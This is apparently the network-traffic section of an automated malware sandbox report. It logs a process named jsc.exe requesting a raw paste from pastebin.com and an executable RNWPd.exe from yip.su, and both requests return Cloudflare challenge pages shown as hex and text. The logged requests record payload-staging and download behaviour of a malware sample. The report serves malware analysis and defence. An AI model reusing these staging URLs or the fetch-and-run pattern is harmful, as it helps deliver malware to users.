                                    Data Ascii: cf-chl-out: cazDu5Roo183RWmaGovHKUPIKybNLQFYP+ZqenEghiWbK6O6gJR1EcssVk3T4eIFo4o22R5EfSI1VSx6fFEQ6PJPR9kWCjVsLKp+uFCwV0k=$8rYKAzhLJsPKhWcQIFuttg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:00 UTC1369INData Raw: 33 64 66 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfb<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:00 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:00 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:11:00 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:00 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:00 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:00 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:00 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 30 34 37 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 66 35 35 33 66 35 64 34 32 61 66 27 2c 63 48 61 73 68 3a 20 27 35 65 61 33 62 66 63 33 61 33 32 63 38 33 33 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 4e 48 6d 5a 6f 6c 59 6e 6c 5f 44 4e 74 35 45 50 35 6a 4e 2e 72 4e 47 39 43 2e 55 75 61 56 32 62 76 76 34 56 39 53 68 30 53 4c 6b 2d 31 37 32 33 39 33 32 36 36 30 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d 65
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '3047',cRay: '8b4cff553f5d42af',cHash: '5ea3bfc3a32c833',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=NHmZolYnl_DNt5EP5jN.rNG9C.UuaV2bvv4V9Sh0SLk-1723932660-0.0.1.1-4137",cFPWv: 'g',cTTime
                                    2024-08-17 22:11:00 UTC1369INData Raw: 34 44 52 4c 48 4f 46 41 39 70 45 51 37 43 59 63 33 64 62 50 6d 78 4a 32 7a 74 6b 67 69 43 78 62 79 65 76 53 70 32 41 5a 55 56 6d 4c 71 38 47 46 71 71 4e 75 6f 32 64 35 37 6a 45 4b 44 68 6e 42 55 4c 71 49 77 77 51 34 61 4f 4a 44 62 6f 75 76 34 43 61 51 5f 75 4a 51 6d 47 55 6d 4c 50 44 2e 6f 6f 57 30 6e 57 33 68 56 54 32 71 7a 45 4f 77 6f 6d 59 5a 4d 32 75 32 45 77 54 31 46 76 36 39 59 30 5a 62 45 7a 48 6e 69 4d 68 31 4a 4e 6e 59 48 4f 6a 6c 4c 68 48 31 6a 52 43 67 59 79 70 44 49 4b 35 53 66 6f 46 77 7a 73 45 5f 59 56 4c 7a 79 5a 4b 4a 6f 72 53 30 73 77 30 35 7a 45 70 51 55 5a 56 39 68 62 33 30 79 6f 62 68 6c 50 6d 32 6b 73 6f 74 56 51 56 6d 31 32 33 4e 38 34 56 43 62 69 53 72 37 75 69 70 78 45 6d 6e 5a 44 51 76 5a 55 42 43 74 69 37 54 33 7a 42 56 77 50 6f
                                    Data Ascii: 4DRLHOFA9pEQ7CYc3dbPmxJ2ztkgiCxbyevSp2AZUVmLq8GFqqNuo2d57jEKDhnBULqIwwQ4aOJDbouv4CaQ_uJQmGUmLPD.ooW0nW3hVT2qzEOwomYZM2u2EwT1Fv69Y0ZbEzHniMh1JNnYHOjlLhH1jRCgYypDIK5SfoFwzsE_YVLzyZKJorS0sw05zEpQUZV9hb30yobhlPm2ksotVQVm123N84VCbiSr7uipxEmnZDQvZUBCti7T3zBVwPo


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    61192.168.2.549788104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:05 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:05 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:11:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cff7538af80d6-EWR
                                    2024-08-17 22:11:05 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:11:05 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:11:05 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:11:05 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:11:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    62192.168.2.549789188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:05 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:05 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:05 UTC681INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 51 62 73 4f 34 54 73 66 6b 48 69 54 52 4a 6c 42 6f 6d 52 7a 6c 51 47 32 6d 35 71 6c 33 71 37 4a 67 65 51 4b 2f 4c 39 46 4a 53 68 53 63 43 68 30 79 61 66 46 4e 6d 58 34 4c 77 66 54 70 63 39 50 44 54 64 6b 4d 4f 58 38 39 53 58 6e 6d 46 64 4c 55 50 62 64 4e 75 4a 56 69 47 48 2b 77 59 75 63 43 65 54 71 70 7a 4b 37 45 30 6b 3d 24 34 2b 63 54 72 46 63 68 33 32 71 48 33 34 35 43 70 6c 32 65 72 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: QbsO4TsfkHiTRJlBomRzlQG2m5ql3q7JgeQK/L9FJShScCh0yafFNmX4LwfTpc9PDTdkMOX89SXnmFdLUPbdNuJViGH+wYucCeTqpzK7E0k=$4+cTrFch32qH345Cpl2erQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:05 UTC1369INData Raw: 33 65 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e11<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:05 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:05 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
